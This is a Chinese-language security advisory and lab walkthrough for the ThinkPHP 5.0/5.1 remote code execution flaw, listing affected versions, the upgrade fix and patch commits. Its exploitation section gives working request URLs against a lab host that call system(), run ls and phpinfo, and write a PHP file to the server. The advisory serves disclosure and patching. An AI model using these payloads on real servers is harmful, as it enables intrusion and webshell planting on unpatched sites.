ThinkPHP5远程代码执行高危漏洞

来自阿里云云盾漏洞检测:

CVSS分值: 无

CVSS: 无

披露时间: 2018-12-10

CVE ID: 无

简介:

ThinkPHP 是一款兼容性高、部署简单的轻量级国产PHP开发框架。
2018年12月10日,阿里云云盾应急响应中心监测到ThinkPHP官方发布安全更新,披露了一个高危安全漏洞,攻击者构造特定的恶意请求,可以直接获取服务器权限,受影响的版本包括5.0和5.1版本

详情:

漏洞描述

由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。


漏洞评级

严重


影响版本

ThinkPHP 5.0系列 < 5.0.23

ThinkPHP 5.1系列 < 5.1.31


安全版本

ThinkPHP 5.0系列 5.0.23

ThinkPHP 5.1系列 5.1.31

解决方案:

安全建议升级ThinkPHP至安全版本

官方解决方案:https://blog.thinkphp.cn/869075

本次版本更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。

ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell)

漏洞分析

Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

关键代码:

// 获取控制器名$controller       = strip_tags($result[1] ?: $this->rule->getConfig('default_controller'));

在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。

漏洞利用

漏洞环境源码:https://github.com/vulnspy/thinkphp-5.1.29

1. 点击右上角的 START TO HACK 按钮创建实验环境

2. 进入实验环境

3. 执行系统命令显示目录下文件

http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l
http://tp.vsplate.me/public/index.php?s=/index/\think\request/cache&key=ls%20-l|system

4. 执行phpinfo

http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'
http://tp.vsplate.me/public/index.php?s=/index/\think\request/cache&key=1|phpinfo

5. 写info.php文件

方法 1:

http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20phpinfo();?>%27%20>%20info.php

方法 2:

http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E

访问 info.php